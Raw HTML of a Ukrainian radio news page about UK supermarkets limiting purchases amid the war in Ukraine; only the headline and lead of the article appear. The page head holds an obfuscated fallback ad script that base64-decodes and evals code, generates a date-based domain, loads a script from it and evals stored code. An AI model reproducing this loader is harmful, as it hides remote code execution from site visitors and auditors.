<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />

<link rel="shortcut icon" href="/assets/images/favicons/favicon.ico?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/assets/images/favicons/apple-icon-57x57.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/assets/images/favicons/apple-icon-114x114.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/assets/images/favicons/apple-icon-72x72.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/assets/images/favicons/apple-icon-144x144.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/assets/images/favicons/apple-icon-60x60.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/assets/images/favicons/apple-icon-120x120.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/assets/images/favicons/apple-icon-76x76.png?v=46" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/assets/images/favicons/apple-icon-152x152.png?v=46" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-196x196.png?v=46" sizes="196x196" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-96x96.png?v=46" sizes="96x96" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-64x64.png?v=46" sizes="64x64" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-48x48.png?v=46" sizes="48x48" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-32x32.png?v=46" sizes="32x32" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-24x24.png?v=46" sizes="24x24" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-16x16.png?v=46" sizes="16x16" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-128x128.png?v=46" sizes="128x128" />
<meta name="msapplication-square70x70logo" content="/assets/images/favicons/mstile-70x70.png?v=46" />
<meta name="msapplication-square150x150logo" content="/assets/images/favicons/mstile-150x150.png?v=46" />
<meta name="msapplication-wide310x150logo" content="/assets/images/favicons/mstile-310x150.png?v=46" />
<meta name="msapplication-square310x310logo" content="/assets/images/favicons/mstile-310x310.png?v=46" />
<meta name="msapplication-TileColor" content="#ffffff" />

<link rel="stylesheet" href="/assets/css/app.min.css?v=46">
<link rel="stylesheet" href="/assets/css/fotorama.css?v=46">
<script></script>
<script>
        var isMobile = function () {
    return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
};

var lazyLoadScripts = function (func, time) {
    window.addEventListener('load', function () {
        setTimeout(func, time);
    });
}

if (isMobile()) {
                                            } else {
    var node6778 = document.getElementById("MIXADV_6778");
    if( node6778 )
    {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6778&r="+Math.random();
        node6778.parentNode.appendChild(script);
        script.onerror = function(){
            window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY3NzggLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjc3OC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY3NzgucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY3NzguaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY3NzgiKSkgfSwgNTAwMCk7ICA7fTsg") );
        }
    }
}    </script>
<![if !IE]>
<script src="/assets/js/jquery-3.6.0.min.js?v=46"></script>
<![endif]>
<script src="/assets/js/lib.top.min.js?v=46"></script>
<![if IE]>
<script src="/assets/js/html5shiv.min.js?v=46"></script>
<script src="/assets/js/jquery-1.12.0.min.js?v=46"></script>
<script src="/assets/js/respond.min.js?v=46"></script>
<script src="/assets/js/rem.min.js?v=46"></script>
<![endif]>
<title data-ajax-replace="true">Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари - Радіо Максимум</title>
<meta data-ajax-replace="true" name="title" content="Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари - Радіо Максимум" />
<meta data-ajax-replace="true" name="description" content="Звичайні британці вже відчули наслідки війни в Україні, адже тепер у багатьох супермаркетах виникли проблеми з певними товарами. Вторгнення російських окупантів вдарило по постачанню продуктів." />
<link data-ajax-replace="true" rel="canonical" href="https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564" />
<link data-ajax-replace="true" rel="amphtml" href="https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564/amp">
<meta data-ajax-replace="true" name="author" content='maximum.fm'>
<meta data-ajax-replace="true" name="apple-itunes-app" content="app-id=797596046">
<meta data-ajax-replace="true" name="google-play-app" content="app-id=com.radio24.ua">
<meta data-ajax-replace="true" property="og:type" content="website" />
<meta data-ajax-replace="true" property="og:title" content="Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари - Радіо Максимум" />
<meta data-ajax-replace="true" property="og:description" content="Звичайні британці вже відчули наслідки війни в Україні, адже тепер у багатьох супермаркетах виникли проблеми з певними товарами. Вторгнення російських окупантів вдарило по постачанню продуктів." />
<meta data-ajax-replace="true" property="og:site_name" content="Радіо Максимум" />
<meta property="og:image" content="https://maximum.fm/uploads/media_news/2022/04/62651c00836d4769246987.jpg?w=1200&amp;h=675&amp;il&amp;q=65&amp;output=jpg" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@MAXIMUMFM_ua" />
<meta name="twitter:creator" content="@MAXIMUMFM_ua" />
<meta data-ajax-replace="true" property="og:url" content="https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564" />
<meta data-ajax-replace="true" property="fb:admins" content="100002197865474" />
<meta data-ajax-replace="true" property="fb:app_id" content="899863283383667" />
<meta data-ajax-replace="true" property="fb:pages" content="100876706667611" />
<script type="application/ld+json">
            {
              "@context": "http://schema.org",
              "@type": "NewsArticle",
              "mainEntityOfPage":{
                "@type": "WebPage",
                "@id": "https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564"
              },
              "headline": "Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари",
              "image": {
                "@type": "ImageObject",
                "url": "https://maximum.fm/uploads/media_news/2022/04/62651c00836d4769246987.jpg?w=1200&amp;h=675&amp;il&amp;q=65&amp;output=jpg",
                "width": 1200,
                "height": 675
              },
              "datePublished": "2022-04-24 12:52:00",
              "dateModified": "2022-04-25 08:07:42",
                "author": {
                    "@type": "Organization",
                    "name": "maximum.fm"
                },

                "publisher": {
                    "@type": "Organization",
                    "name": "maximum.fm",
                    "email": "music@maximum.fm",
                    "url": "https://maximum.fm/",
                    "logo": {
                        "@type": "ImageObject",
                        "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png?v=46",
                        "width": 60,
                        "height": 60
                    }
                }
            }

    </script>
<script type="application/ld+json">
        {
         "@context": "http://schema.org",
         "@type": "BreadcrumbList",
         "itemListElement": [{
                    "@type": "ListItem",
                    "position": 1,
                    "name": "Радіо Максимум",
                    "item": "https://maximum.fm/"
                },{
                    "@type": "ListItem",
                    "position": 2,
                    "name": "Україна",
                    "item": "https://maximum.fm/ukrayina_t22822"
                }

                            ,{
                    "@type": "ListItem",
                    "position": 3,
                    "name": "війна",
                    "item": "https://maximum.fm/vijna_t22973"
                }
                        ]
        }
    </script>

<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W8D5HV"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-W8D5HV');</script>

<link rel="manifest" href="/manifest.json">
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('head');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://cdn.gravitec.net/storage/7e008d1c9fd1a6f52c684c44732eb9f0/client.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>
</head>
<body>
<script>
    var dfpAdSlots = [];
</script>
<header class="radio">
<div class="top-section">
<div class="row  red-pla">
<div class="logo-wrapper">
<a href="/" class="header-logo ajaxLink" data-url="/">
</a>
</div>
<div class="all-stations-wrapper stations-wrapper">
<div class="all-stations">
<a id="otherStationsButton" class="open-next-station" aria-expanded="true" style="display: none;">
</a>
<div class="other-stations station-list" id="otherStations" aria-expanded="true">
<div class="next-station-text">Радіостанції</div>
<div class="station-wrapper station-item">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
</button>
<a href="/archive" class="ajaxLink" data-url="/archive" title="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
<div class="station-name">ONAIR</div>
</a>
</div>
</div>
<div class="station-wrapper station-wrapper-top">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR"></button>
<div class="station-name">
<div>
слухати
<span> ONAIR</span>
</div>
<a href="" id="audio-adv" class="link-to-adv hidden" target="_blank">Перейти на сайт рекламодавця</a>
</div>
</div>
</div>
</div>
<div class="column on-air-wrapper">
<div class="playing-songs-wrapper">
<a data-toggle="openNextSongs openNextSongsButton" data-toggler=".active" id="openNextSongsButton" class="open-next-songs" aria-expanded="true" data-b="efqd6m-b" style="">
</a>
<div class="next-songs-wrapper" id="openNextSongs" data-toggler=".active" aria-expanded="true" data-b="iteq36-b">
<div class="next-songs-text">Далі в ефірі:</div>
<div class="next-songs-list"></div>
</div>
<div class="song-wrapper now-playing-song"></div>
</div>
</div>
<div class="options-wrapper column medium-4 large-4 small-5 " id="profile-wrapper">
<div class="volume show-for-large">
<div class="volume-sign up"></div>
<div class="volume-slider-wrapper ">
<div class="slider volume-progress" data-slider data-initial-start="100" data-start="0">
<span class="volume-progress-handle" data-slider-handle role="slider" tabindex="1" style="left: 100%;"></span>
<span class="volume-progress-fill" data-slider-fill></span>
<input type="hidden">
</div>
</div>
</div>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="webcamera-wrapper">
<div class="row">
<div class="small-12 columns">
<h2>
ВЕБ-КАМЕРА
</h2>
</div>
<div class="medium-8 small-12 columns">
<div class="iframe-wrapper">
<video id="webcamera-player" class="video-js vjs-default-skin tube-css vjs-16-9" preload="auto" poster="https://maximum.fm/assets/images/maximum-new-red-2020-10.svg?v=46" controls playsinline>
</video>
</div>
</div>
<div class="medium-4 small-12 columns other-video-wrapper">
<div class="other-video">
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/04/626680793b9a3685269730.jpg?w=110&amp;h=77&amp;il&amp;q=65&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/fortecya-dlya-tisyachi-simej-tina-karol-pokazala-davnij-vistup-na-azovstali_n203579" target="_self" title="" class=" ajaxLink" href="/fortecya-dlya-tisyachi-simej-tina-karol-pokazala-davnij-vistup-na-azovstali_n203579">
"Фортеця для тисячі сімей": Тіна Кароль показала давній виступ на Азовсталі
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 13:56
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2021/03/6062f509d775d668224729.png?w=110&amp;h=77&amp;il&amp;q=65&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/7-multfilmiv-pro-velikden-dlya-ditej-ukrayinskoyu-yak-rozkazati-ditini-pro-pashu-video_n191436" target="_self" title="" class=" ajaxLink" href="/7-multfilmiv-pro-velikden-dlya-ditej-ukrayinskoyu-yak-rozkazati-ditini-pro-pashu-video_n191436">
7 мультфільмів про Великдень для дітей українською: як розказати дитині про Пасху (відео)
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 10:52
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/04/626648e937e30710619308.png?w=110&amp;h=77&amp;il&amp;q=65&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/ukrayinci-duzhe-gostinni-yak-nashi-bijci-znishchuyut-vorozhi-bmp---vognyane-video_n203571" target="_self" title="" class=" ajaxLink" href="/ukrayinci-duzhe-gostinni-yak-nashi-bijci-znishchuyut-vorozhi-bmp---vognyane-video_n203571">
"Українці дуже гостинні": як наші бійці знищують ворожі БМП – вогняне відео
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 10:25
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/04/626105454591f748426049.jpg?w=110&amp;h=77&amp;il&amp;q=65&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/ti-moye-serdenko-ya-ne-mozhu-zhiti-bez-serdenka-z-yakogo-filmu-cya-fraza_n203490" target="_self" title="" class=" ajaxLink" href="/ti-moye-serdenko-ya-ne-mozhu-zhiti-bez-serdenka-z-yakogo-filmu-cya-fraza_n203490">
"Ти моє серденько, я не можу жити без серденька": з якого фільму ця фраза
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 09:52
</footer>
</div>
</div>
</div>
<button class="load-more load-more-news">
arrow
</button>
</div>
</div>
</div>
<div class="bottom-section">
<div class="row  menu-wrapper">
<div class="small-12 columns">
<div class="row">
<div class="small-12 columns">
<div class="mobile-header" style="">
<div class="hamburger hamburger--collapse">
<span class="hamburger-box">
<span class="hamburger-inner"></span>
</span>
</div>
 <a href="/" class="logo ajaxLink" data-url="/">
<img src="/assets/images/logo-maximum-2020-10.svg?v=46" style="width: 100px; height: 54px" alt="Mobile logo">
</a>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
<div class="menu">
<div class="tagName-novini menu-item ">
<a href="/novini_t2" class="menu-link ajaxLink" data-url="/novini_t2">
Новини
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/ukrayina_t22822" class="tagName-ukrayina sub-menu-item ajaxLink" data-url="/ukrayina_t22822">
Україна
</a>
<a href="/svit_t15" class="tagName-svit sub-menu-item ajaxLink" data-url="/svit_t15">
Світ
</a>
<a href="/sport_t22784" class="tagName-sport sub-menu-item ajaxLink" data-url="/sport_t22784">
Спорт
</a>
<a href="/kultura_t10" class="tagName-kultura sub-menu-item ajaxLink" data-url="/kultura_t10">
Культура
</a>
<a href="/foto_t6" class="tagName-foto sub-menu-item ajaxLink" data-url="/foto_t6">
Фото
</a>
<a href="/video_t7" class="tagName-video sub-menu-item ajaxLink" data-url="/video_t7">
Відео
</a>
</div>
</div>
</div>
<div class="tagName-shou-biz menu-item ">
<a href="/shou-biz_t22786" class="menu-link ajaxLink" data-url="/shou-biz_t22786">
Шоу-біз
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zirki_t23798" class="tagName-zirki sub-menu-item ajaxLink" data-url="/zirki_t23798">
Зірки
</a>
<a href="/moda_t22837" class="tagName-moda sub-menu-item ajaxLink" data-url="/moda_t22837">
Мода
</a>
<a href="/kino_t22736" class="tagName-kino sub-menu-item ajaxLink" data-url="/kino_t22736">
Кіно
</a>
<a href="/seriali_t23561" class="tagName-seriali sub-menu-item ajaxLink" data-url="/seriali_t23561">
Серіали
</a>
<a href="/televizijni-shou_t23799" class="tagName-televizijni-shou sub-menu-item ajaxLink" data-url="/televizijni-shou_t23799">
ТБ-шоу
</a>
<a href="/muzichni-novinki_t23831" class="tagName-muzichni-novinki sub-menu-item ajaxLink" data-url="/muzichni-novinki_t23831">
Музичні новинки
</a>
</div>
</div>
</div>
<div class="tagName-lajfstajl menu-item ">
<a href="/lajfstajl_t23832" class="menu-link ajaxLink" data-url="/lajfstajl_t23832">
Лайфстайл
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zdorovya_t22746" class="tagName-zdorovya sub-menu-item ajaxLink" data-url="/zdorovya_t22746">
Здоров&#039;я
</a>
<a href="/yizha_t23025" class="tagName-yizha sub-menu-item ajaxLink" data-url="/yizha_t23025">
Їжа
</a>
<a href="/kurjozi_t22751" class="tagName-kurjozi sub-menu-item ajaxLink" data-url="/kurjozi_t22751">
Курйози
</a>
<a href="/podorozhi_t22743" class="tagName-podorozhi sub-menu-item ajaxLink" data-url="/podorozhi_t22743">
Подорожі
</a>
<a href="/goroskop_t23796" class="tagName-goroskop sub-menu-item ajaxLink" data-url="/goroskop_t23796">
Гороскоп
</a>
<a href="/testi_t22841" class="tagName-testi sub-menu-item ajaxLink" data-url="/testi_t22841">
Тести
 </a>
</div>
</div>
</div>
<div class="tagName-tehnologiyi menu-item ">
<a href="/tehnologiyi_t18" class="menu-link ajaxLink" data-url="/tehnologiyi_t18">
Техно
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/gadzheti_t22745" class="tagName-gadzheti sub-menu-item ajaxLink" data-url="/gadzheti_t22745">
Гаджети
</a>
<a href="/avto_t22770" class="tagName-avto sub-menu-item ajaxLink" data-url="/avto_t22770">
Авто
</a>
<a href="/pobutova-tehnika_t23833" class="tagName-pobutova-tehnika sub-menu-item ajaxLink" data-url="/pobutova-tehnika_t23833">
Побутова техніка
</a>
<a href="/internet_t22835" class="tagName-internet sub-menu-item ajaxLink" data-url="/internet_t22835">
Інтернет
</a>
<a href="/igri_t23443" class="tagName-igri sub-menu-item ajaxLink" data-url="/igri_t23443">
 Ігри
</a>
<a href="/kosmos_t22839" class="tagName-kosmos sub-menu-item ajaxLink" data-url="/kosmos_t22839">
Космос
</a>
</div>
</div>
</div>
<div class="tagName-populyarne menu-item ">
<a href="/populyarne_t23834" class="menu-link ajaxLink" data-url="/populyarne_t23834">
Популярне
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/nostalgiya_t23821" class="tagName-nostalgiya sub-menu-item ajaxLink" data-url="/nostalgiya_t23821">
Ностальгія
</a>
<a href="/cikavinki_t23802" class="tagName-cikavinki sub-menu-item ajaxLink" data-url="/cikavinki_t23802">
Цікаві новини
</a>
<a href="/ukrayinska-muzika_t23685" class="tagName-ukrayinska-muzika sub-menu-item ajaxLink" data-url="/ukrayinska-muzika_t23685">
Українська музика
</a>
<a href="/privitannya_t23757" class="tagName-privitannya sub-menu-item ajaxLink" data-url="/privitannya_t23757">
Привітання
</a>
<a href="/recepti_t23098" class="tagName-recepti sub-menu-item ajaxLink" data-url="/recepti_t23098">
Рецепти
</a>
<a href="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="tagName- sub-menu-item ajaxLink" data-url="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
З днем народження
</a>
</div>
</div>
</div>
<div class="tagName-pro-radio menu-item ">
<a href="/pro-radio_t23861" class="menu-link ajaxLink" data-url="/pro-radio_t23861">
Про радіо
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/staff" class="tagName- sub-menu-item ajaxLink" data-url="/staff">
Ведучі
</a>
<a href="/radiocovermap" class="tagName- sub-menu-item ajaxLink" data-url="/radiocovermap">
Карта покриття
</a>
<a href="/contacts" class="tagName- sub-menu-item ajaxLink" data-url="/contacts">
Контакти
</a>
<a href="/archive" class="tagName- sub-menu-item ajaxLink" data-url="/archive">
Що звучало в ефірі
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="main-content">
<div class="reveal" style="position: relative;" id="register-start" data-reveal>
<span class="replace-h3">Вітаємо на сайті Радіо Максимум!</span>
<p class='lead'>На вказану електронну адресу було надіслано повідомлення для підтвердження реєстрації</p>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="resetting-start" data-reveal>
<form action="/resetting/send-email" method="POST" class="fos_user_resetting_request" id="fos_user_resetting_request" novalidate>
<span class="replace-h4">Форма для відновлення паролю</span>
<div>
<input type="text" class="base-input" id="username_email" name="username" required="required" placeholder="Введіть логін або електронну пошту!" autofocus />
<p id="error-message" style="display: none; color: red;">Такий логін або адреса електронної пошти не зареєстровані в системі!</p>
</div>
<div class="large-4 float-right ">
<button type="submit" class="border-button " value="Надіслати">Надіслати</button>
</div>
</form>
<span class="replace-h5" id="show-message-from-resetting"></span>
<button class="close-button" data-close aria-label="Close reveal" type="button">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="user-update" data-reveal>
<span class="replace-h4" style="text-align: center">Вітаємо, Ваші дані успішно оновлено!</span>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<script>
        if (typeof window.widget !== 'undefined') {
            window.widget.changeParam('newsId', '203564');
        }
    </script>
<div class="white">
<div id="loadNewsContainerData" data-news-id="203564" data-limit="1" data-offset="0" data-url="/get-scroll-news">
</div>
<div class="content-wrapper  row" data-title="Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари" data-image="https://maximum.fm/uploads/media_news/2022/04/62651c00836d4769246987.jpg?w=424&amp;h=239&amp;il&amp;q=65&amp;output=jpg" data-author="Наталія Лейцюсь" data-path="/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564" data-tags="Україна, війна, Росія, Економіка, Великобританія, Суспільство, Їжа">
<div class="columns small-12 medium-12 large-8">
<div>
<div id="ontheioViewTacking" data-tags="Україна,війна,Росія,Економіка,Великобританія,Суспільство,Їжа,Новини" class="news-content-wrapper" data-title="Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари - Радіо Максимум" data-path="/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564" data-id="203564">
<div class="top-tags-wrapper">
<a href="/vijna_t22973" class="top-tag">
<i class="flash"></i>війна</a>
</div>
<div class="news-title"><h1>Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари</h1>
</div>
<ul class="statistic">
<li class="date">
<time datetime="2022-04-24 12:52">
Вчора, 12:52
</time>
</li>
<li class="watchers">17</li>
</ul>
<div class="news-photo-container">
<div class="news-photo">
<img src="/uploads/media_news/2022/04/62651c00836d4769246987.jpg?w=1200&amp;h=675&amp;il&amp;q=65&amp;output=jpg" title="У британських супермаркетах ввели обмеження на купівлю олії - 1" alt="У британських супермаркетах ввели обмеження на купівлю олії - фото 1">
<div class="photo-credits">У британських супермаркетах ввели обмеження на купівлю олії
/ Malgorzata Bujalska on Unsplash
</div>
<ul class="news-sharing ">
<li class="facebook-count counter">
<a id="facebook" data-news-url="https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564" href="javascript: void(0);" class="facebook inPage soc_counter_fb_203564">
</a>
</li>
<li class="twitter-count counter">
<a id="twitter" data-news-url="https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564" data-news-name="Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари" href="javascript: void(0);" class="twitter inPage soc_counter_tw_203564">
</a>
</li>
</ul>
</div>
<div class="news-photo-sideblock show-for-medium">
<ul class="popular-news">
<li class="title">Популярне</li>
<li><a class="ajaxLink" data-url="/kartinki-z-dnem-dochki-vitalni-listivki-i-vidkritki_n188493" title="" href="/kartinki-z-dnem-dochki-vitalni-listivki-i-vidkritki_n188493">Картинки з Днем дочки 2022: вітальні листівки і відкритки</a></li>
<li><a class="ajaxLink" data-url="/simptom-fantomnoyi-sireni-shcho-z-cim-robiti_n202359" title="" href="/simptom-fantomnoyi-sireni-shcho-z-cim-robiti_n202359">Симптом фантомної сирени: що з цим робити</a></li>
</ul>
</div>
</div>
<div class="news-content news-content-block">
<p class="subtitle"><strong>Звичайні британці вже відчули наслідки війни в Україні, адже тепер у багатьох супермаркетах виникли проблеми з певними товарами. Вторгнення російських окупантів вдарило по постачанню продуктів.</strong></p>
<style>
    @media (max-width: 640px) {
        #mobileBrandingPlace {
            padding-bottom: 56.21%;
            z-index: 9;
            margin: 10px 0;
            order: -2;
        }
        #mobileBranding {
            margin: 0 !important;
        }
    }
</style>
<div class="mobileBrandingPlace" id="mobileBrandingPlace"></div>
